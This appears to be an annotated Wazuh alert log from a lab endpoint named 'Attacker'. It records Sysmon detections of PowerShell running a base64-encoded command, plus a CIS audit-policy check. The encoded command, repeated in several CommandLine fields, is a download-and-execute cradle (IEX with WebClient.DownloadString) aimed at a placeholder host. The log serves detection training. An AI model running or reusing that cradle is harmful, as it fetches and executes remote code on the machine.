data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:02.553
ProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00}
ProcessId: 16112
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_n3jscojm.st0.ps1
CreationUtcTime: 2025-04-24 22:40:02.553
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:02.553 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16112 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_n3jscojm.st0.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:02.553 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable' Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19012 Numeric ID of the detection rule that fired.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.7.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534406.1968184 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 2137254061 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26161 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Audit Policy Change' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports changes in audit policy including SACL changes. Events for this subcategory include: - 4715: The audit policy (SACL) on an object was changed. - 4719: System audit policy was changed. - 4902: The Per-user audit policy table was created. - 4904: An attempt was made to register a security event source. - 4905: An attempt was made to unregister a security event source. - 4906: The CrashOnAuditFail value has changed. - 4907: Auditing settings on object were changed. - 4908: Special Groups Logon table modified. - 4912: Per User Audit Policy was changed. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Audit Policy Change Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.7.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Audit Policy Change"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: not applicable PASS or FAIL. Red = needs fixing.
data.sca.check.reason: Timeout overtaken running command 'auditpol.exe /get /subcategory:"Audit Policy Change"' No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.previous_result: passed Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 100 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534407.1971685 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:04.7532925Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285708 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:04.088
ProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00}
ProcessId: 15516
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00}
ParentProcessId: 16112
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:04.088 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16112 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 104 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534407.1979756 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:04.9670806Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285714 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:04.958
ProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00}
ProcessId: 15516
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wykul3a2.t0d.ps1
CreationUtcTime: 2025-04-24 22:40:04.958
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:04.958 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wykul3a2.t0d.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:40:04.958 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 101 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534408.1982525 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:06.4519847Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285733 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:05.956
ProcessGuid: {94294ddc-bdc5-680a-c20b-000000000e00}
ProcessId: 16460
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00}
ParentProcessId: 15516
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:05.956 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc5-680a-c20b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16460 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 105 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534408.1990596 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:06.7153003Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285734 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
